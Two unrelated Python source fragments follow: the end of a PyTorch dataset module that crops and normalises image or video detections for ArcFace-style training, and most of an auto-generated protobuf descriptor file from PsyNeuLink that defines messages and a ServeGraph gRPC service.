        # frame = self.frames_ids[index % self.n]
        vdoPath = self.videos[v_index]
        cap = cv2.VideoCapture(vdoPath)
        frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
        frame = int((frames // self.n) * (index % self.n))
        cap.release()
        vdo_id = self.ids[v_index]
        return vdoPath, vdo_id, str(frame)
class TestDataset(Dataset):
    def __init__(self, root_dir, items, size, mode):
        assert mode in ['image', 'video']
        self.mode = mode
        self.size = size
        self.root_dir = root_dir
        self.items = items
        self.length = len(items)
        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.items) * 2

    def __getitem__(self, index):
        frame, imgID, imgPath, xmin, ymin, xmax, ymax, classes, text = self.items[index % self.length]
        if self.mode == 'image':
            img = cv2.imread(imgPath)
        else:
            cap = cv2.VideoCapture(imgPath)
            cap.set(cv2.CAP_PROP_POS_FRAMES, int(frame))
            ret, img = cap.read()
            cap.release()
        det = img[ymin:ymax, xmin:xmax, :]
        if index >= self.length:
            det = det[:, ::-1, :].copy()
        det = cv2.resize(det, self.size)
        det = cv2.cvtColor(det, cv2.COLOR_BGR2RGB)
        det = det.astype(np.float32) / 255
        det = torch.from_numpy(det)
        det = det.permute(2, 0, 1)
        det = self.transform(det)
        return {
            'img': det,
            'imgID': imgID,
            'frame': frame,
            'box': np.array([xmin, ymin, xmax, ymax]),
            'classes': classes,
            'text': text}
if __name__ == "__main__":
    from config import get_args_arcface
    opt = get_args_arcface()
    dataset = ArcfaceDataset()
    # print(len(dataset))
    print(dataset[0])
    # from utils import collater_HardTriplet
    # from torch.utils.data import DataLoader
    # training_params = {"batch_size": 20,
    #                    "shuffle": True,
    #                    "drop_last": True,
    #                    "collate_fn": collater_HardTriplet,
    #                    "num_workers": 4}
    # from PIL import Image
    # dataset = ArcfaceDataset()
    # print(dataset[0])
    # loader = DataLoader(dataset, **training_params)
    # for data in loader:
    #     print(data['img'].size())
    #     break
    # print(len(dataset))
    # for d in tqdm(dataset):
    #     pass
    # img = dataset[100]['img']
    # mi = min(img.view(-1))
    # ma = max(img.view(-1))
    # img = (img-mi)/(ma-mi)
    # img = img*256
    # img = img.permute(1, 2, 0)
    # img = img.numpy()
    # img = Image.fromarray(img.astype(np.uint8))
    # img.save('aaa.jpg')
    # img = dataset[0]['vdo']
    # mi = min(img.view(-1))
    # ma = max(img.view(-1))
    # img = (img-mi)/(ma-mi)
    # img = img*256
    # img = img.permute(1, 2, 0)
    # img = img.numpy()
    # img = Image.fromarray(img.astype(np.uint8))
    # img.save('bbb.jpg')
    # mean = np.zeros(3)
    # std = np.zeros(3)
    # for d in tqdm(dataset):
    #     img = d['img']
    #     for i in range(3):
    #         mean[i] += img[:, :, i].mean()
    #         std[i] += img[:, :, i].std()
    # mean = mean / len(dataset)
    # std = std / len(dataset)
    # print(mean, std)
# -*- coding: utf-8 -*-
# psyneulink/core/rpc/graph_pb2.py (JeshuaT/PsyNeuLink, Apache-2.0)
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: graph.proto
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='graph.proto',
package='graph',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0bgraph.proto\x12\x05graph\"\x0e\n\x0cNullArgument\"\x1e\n\x0cHealthStatus\x12\x0e\n\x06status\x18\x01 \x01(\t\"\x17\n\x07PNLPath\x12\x0c\n\x04path\x18\x01 \x01(\t\"\x1a\n\nScriptPath\x12\x0c\n\x04path\x18\x01 \x01(\t\"*\n\x12ScriptCompositions\x12\x14\n\x0c\x63ompositions\x18\x01 \x03(\t\"&\n\x10ScriptComponents\x12\x12\n\ncomponents\x18\x01 \x03(\t\"\x19\n\tGraphName\x12\x0c\n\x04name\x18\x01 \x01(\t\"#\n\rParameterList\x12\x12\n\nparameters\x18\x01 \x03(\t\"\x1d\n\rComponentName\x12\x0c\n\x04name\x18\x01 \x01(\t\"3\n\tGraphJSON\x12\x13\n\x0bobjectsJSON\x18\x01 \x01(\t\x12\x11\n\tstyleJSON\x18\x02 \x01(\t\"\x1e\n\tStyleJSON\x12\x11\n\tstyleJSON\x18\x01 \x01(\t\"&\n\x07ndArray\x12\r\n\x05shape\x18\x01 \x03(\r\x12\x0c\n\x04\x64\x61ta\x18\x02 \x03(\x01\"6\n\x06Matrix\x12\x0c\n\x04rows\x18\x01 \x01(\r\x12\x0c\n\x04\x63ols\x18\x02 \x01(\r\x12\x10\n\x04\x64\x61ta\x18\x03 \x03(\x01\x42\x02\x10\x01\"s\n\x05\x45ntry\x12\x15\n\rcomponentName\x18\x01 \x01(\t\x12\x15\n\rparameterName\x18\x02 \x01(\t\x12\x0c\n\x04time\x18\x03 \x01(\t\x12\x0f\n\x07\x63ontext\x18\x04 \x01(\t\x12\x1d\n\x05value\x18\x05 \x01(\x0b\x32\x0e.graph.ndArray\"c\n\tServePref\x12\x15\n\rcomponentName\x18\x01 \x01(\t\x12\x15\n\rparameterName\x18\x02 \x01(\t\x12(\n\tcondition\x18\x03 \x01(\x0e\x32\x15.graph.serveCondition\"4\n\nServePrefs\x12&\n\x0cservePrefSet\x18\x01 \x03(\x0b\x32\x10.graph.ServePref\"\xa6\x01\n\rRunTimeParams\x12\x30\n\x06inputs\x18\x01 \x03(\x0b\x32 .graph.RunTimeParams.InputsEntry\x12%\n\nservePrefs\x18\x02 \x01(\x0b\x32\x11.graph.ServePrefs\x1a<\n\x0bInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x1c\n\x05value\x18\x02 \x01(\x0b\x32\r.graph.Matrix:\x02\x38\x01*\x92\x01\n\x0eserveCondition\x12\x12\n\x0eINITIALIZATION\x10\x00\x12\x0e\n\nVALIDATION\x10\x01\x12\r\n\tEXECUTION\x10\x02\x12\x0e\n\nPROCESSING\x10\x03\x12\x0c\n\x08LEARNING\x10\x04\x12\x0b\n\x07\x43ONTROL\x10\x05\x12\x0e\n\nSIMULATION\x10\x06\x12\t\n\x05TRIAL\x10\x07\x12\x07\n\x03RUN\x10\x08\x32\xe8\x04\n\nServeGraph\x12\x36\n\rLoadCustomPnl\x12\x0e.graph.PNLPath\x1a\x13.graph.NullArgument\"\x00\x12<\n\nLoadScript\x12\x11.graph.ScriptPath\x1a\x19.graph.ScriptCompositions\"\x00\x12\x35\n\x0cLoadGraphics\x12\x11.graph.ScriptPath\x1a\x10.graph.StyleJSON\"\x00\x12\x45\n\x15GetLoggableParameters\x12\x14.graph.ComponentName\x1a\x14.graph.ParameterList\"\x00\x12\x43\n\x0fGetCompositions\x12\x13.graph.NullArgument\x1a\x19.graph.ScriptCompositions\"\x00\x12<\n\rGetComponents\x12\x10.graph.GraphName\x1a\x17.graph.ScriptComponents\"\x00\x12/\n\x07GetJSON\x12\x10.graph.GraphName\x1a\x10.graph.GraphJSON\"\x00\x12\x39\n\x0bHealthCheck\x12\x13.graph.NullArgument\x1a\x13.graph.HealthStatus\"\x00\x12=\n\x10UpdateStylesheet\x12\x10.graph.StyleJSON\x1a\x13.graph.NullArgument\"\x00(\x01\x12\x38\n\x0eRunComposition\x12\x14.graph.RunTimeParams\x1a\x0c.graph.Entry\"\x00\x30\x01\x62\x06proto3'
)
_SERVECONDITION = _descriptor.EnumDescriptor(
name='serveCondition',
full_name='graph.serveCondition',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='INITIALIZATION', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='VALIDATION', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EXECUTION', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PROCESSING', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LEARNING', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONTROL', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SIMULATION', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRIAL', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RUN', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=925,
serialized_end=1071,
)
_sym_db.RegisterEnumDescriptor(_SERVECONDITION)
serveCondition = enum_type_wrapper.EnumTypeWrapper(_SERVECONDITION)
INITIALIZATION = 0
VALIDATION = 1
EXECUTION = 2
PROCESSING = 3
LEARNING = 4
CONTROL = 5
SIMULATION = 6
TRIAL = 7
RUN = 8
_NULLARGUMENT = _descriptor.Descriptor(
name='NullArgument',
full_name='graph.NullArgument',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=22,
serialized_end=36,
)
_HEALTHSTATUS = _descriptor.Descriptor(
name='HealthStatus',
full_name='graph.HealthStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='graph.HealthStatus.status', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=38,
serialized_end=68,
)
_PNLPATH = _descriptor.Descriptor(
name='PNLPath',
full_name='graph.PNLPath',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='graph.PNLPath.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=70,
serialized_end=93,
)
_SCRIPTPATH = _descriptor.Descriptor(
name='ScriptPath',
full_name='graph.ScriptPath',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='graph.ScriptPath.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=95,
serialized_end=121,
)
_SCRIPTCOMPOSITIONS = _descriptor.Descriptor(
name='ScriptCompositions',
full_name='graph.ScriptCompositions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='compositions', full_name='graph.ScriptCompositions.compositions', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=123,
serialized_end=165,
)
_SCRIPTCOMPONENTS = _descriptor.Descriptor(
name='ScriptComponents',
full_name='graph.ScriptComponents',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='graph.ScriptComponents.components', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=167,
serialized_end=205,
)
_GRAPHNAME = _descriptor.Descriptor(
name='GraphName',
full_name='graph.GraphName',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='graph.GraphName.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=207,
serialized_end=232,
)
_PARAMETERLIST = _descriptor.Descriptor(
name='ParameterList',
full_name='graph.ParameterList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='parameters', full_name='graph.ParameterList.parameters', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=234,
serialized_end=269,
)
_COMPONENTNAME = _descriptor.Descriptor(
name='ComponentName',
full_name='graph.ComponentName',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='graph.ComponentName.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=271,
serialized_end=300,
)
_GRAPHJSON = _descriptor.Descriptor(
name='GraphJSON',
full_name='graph.GraphJSON',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='objectsJSON', full_name='graph.GraphJSON.objectsJSON', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='styleJSON', full_name='graph.GraphJSON.styleJSON', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=302,
serialized_end=353,
)
_STYLEJSON = _descriptor.Descriptor(
name='StyleJSON',
full_name='graph.StyleJSON',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='styleJSON', full_name='graph.StyleJSON.styleJSON', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=355,
serialized_end=385,
)
_NDARRAY = _descriptor.Descriptor(
name='ndArray',
full_name='graph.ndArray',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='shape', full_name='graph.ndArray.shape', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='graph.ndArray.data', index=1,
number=2, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=387,
serialized_end=425,
)
_MATRIX = _descriptor.Descriptor(
name='Matrix',
full_name='graph.Matrix',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rows', full_name='graph.Matrix.rows', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cols', full_name='graph.Matrix.cols', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='data', full_name='graph.Matrix.data', index=2,
number=3, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=427,
serialized_end=481,
)
_ENTRY = _descriptor.Descriptor(
name='Entry',
full_name='graph.Entry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='componentName', full_name='graph.Entry.componentName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parameterName', full_name='graph.Entry.parameterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time', full_name='graph.Entry.time', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='context', full_name='graph.Entry.context', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='graph.Entry.value', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=483,
serialized_end=598,
)
_SERVEPREF = _descriptor.Descriptor(
name='ServePref',
full_name='graph.ServePref',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='componentName', full_name='graph.ServePref.componentName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parameterName', full_name='graph.ServePref.parameterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='condition', full_name='graph.ServePref.condition', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=600,
serialized_end=699,
)
_SERVEPREFS = _descriptor.Descriptor(
name='ServePrefs',
full_name='graph.ServePrefs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='servePrefSet', full_name='graph.ServePrefs.servePrefSet', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=701,
serialized_end=753,
)
_RUNTIMEPARAMS_INPUTSENTRY = _descriptor.Descriptor(
name='InputsEntry',
full_name='graph.RunTimeParams.InputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='graph.RunTimeParams.InputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='graph.RunTimeParams.InputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=862,
serialized_end=922,
)
_RUNTIMEPARAMS = _descriptor.Descriptor(
name='RunTimeParams',
full_name='graph.RunTimeParams',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='inputs', full_name='graph.RunTimeParams.inputs', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='servePrefs', full_name='graph.RunTimeParams.servePrefs', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_RUNTIMEPARAMS_INPUTSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=756,
serialized_end=922,
)
_ENTRY.fields_by_name['value'].message_type = _NDARRAY
_SERVEPREF.fields_by_name['condition'].enum_type = _SERVECONDITION
_SERVEPREFS.fields_by_name['servePrefSet'].message_type = _SERVEPREF
_RUNTIMEPARAMS_INPUTSENTRY.fields_by_name['value'].message_type = _MATRIX
_RUNTIMEPARAMS_INPUTSENTRY.containing_type = _RUNTIMEPARAMS
_RUNTIMEPARAMS.fields_by_name['inputs'].message_type = _RUNTIMEPARAMS_INPUTSENTRY
_RUNTIMEPARAMS.fields_by_name['servePrefs'].message_type = _SERVEPREFS
DESCRIPTOR.message_types_by_name['NullArgument'] = _NULLARGUMENT
DESCRIPTOR.message_types_by_name['HealthStatus'] = _HEALTHSTATUS
DESCRIPTOR.message_types_by_name['PNLPath'] = _PNLPATH
DESCRIPTOR.message_types_by_name['ScriptPath'] = _SCRIPTPATH
DESCRIPTOR.message_types_by_name['ScriptCompositions'] = _SCRIPTCOMPOSITIONS
DESCRIPTOR.message_types_by_name['ScriptComponents'] = _SCRIPTCOMPONENTS
DESCRIPTOR.message_types_by_name['GraphName'] = _GRAPHNAME
DESCRIPTOR.message_types_by_name['ParameterList'] = _PARAMETERLIST
DESCRIPTOR.message_types_by_name['ComponentName'] = _COMPONENTNAME
DESCRIPTOR.message_types_by_name['GraphJSON'] = _GRAPHJSON
DESCRIPTOR.message_types_by_name['StyleJSON'] = _STYLEJSON
DESCRIPTOR.message_types_by_name['ndArray'] = _NDARRAY
DESCRIPTOR.message_types_by_name['Matrix'] = _MATRIX
DESCRIPTOR.message_types_by_name['Entry'] = _ENTRY
DESCRIPTOR.message_types_by_name['ServePref'] = _SERVEPREF
DESCRIPTOR.message_types_by_name['ServePrefs'] = _SERVEPREFS
DESCRIPTOR.message_types_by_name['RunTimeParams'] = _RUNTIMEPARAMS
DESCRIPTOR.enum_types_by_name['serveCondition'] = _SERVECONDITION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NullArgument = _reflection.GeneratedProtocolMessageType('NullArgument', (_message.Message,), {
'DESCRIPTOR' : _NULLARGUMENT,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.NullArgument)
})
_sym_db.RegisterMessage(NullArgument)
HealthStatus = _reflection.GeneratedProtocolMessageType('HealthStatus', (_message.Message,), {
'DESCRIPTOR' : _HEALTHSTATUS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.HealthStatus)
})
_sym_db.RegisterMessage(HealthStatus)
PNLPath = _reflection.GeneratedProtocolMessageType('PNLPath', (_message.Message,), {
'DESCRIPTOR' : _PNLPATH,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.PNLPath)
})
_sym_db.RegisterMessage(PNLPath)
ScriptPath = _reflection.GeneratedProtocolMessageType('ScriptPath', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTPATH,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptPath)
})
_sym_db.RegisterMessage(ScriptPath)
ScriptCompositions = _reflection.GeneratedProtocolMessageType('ScriptCompositions', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTCOMPOSITIONS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptCompositions)
})
_sym_db.RegisterMessage(ScriptCompositions)
ScriptComponents = _reflection.GeneratedProtocolMessageType('ScriptComponents', (_message.Message,), {
'DESCRIPTOR' : _SCRIPTCOMPONENTS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ScriptComponents)
})
_sym_db.RegisterMessage(ScriptComponents)
GraphName = _reflection.GeneratedProtocolMessageType('GraphName', (_message.Message,), {
'DESCRIPTOR' : _GRAPHNAME,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.GraphName)
})
_sym_db.RegisterMessage(GraphName)
ParameterList = _reflection.GeneratedProtocolMessageType('ParameterList', (_message.Message,), {
'DESCRIPTOR' : _PARAMETERLIST,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ParameterList)
})
_sym_db.RegisterMessage(ParameterList)
ComponentName = _reflection.GeneratedProtocolMessageType('ComponentName', (_message.Message,), {
'DESCRIPTOR' : _COMPONENTNAME,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ComponentName)
})
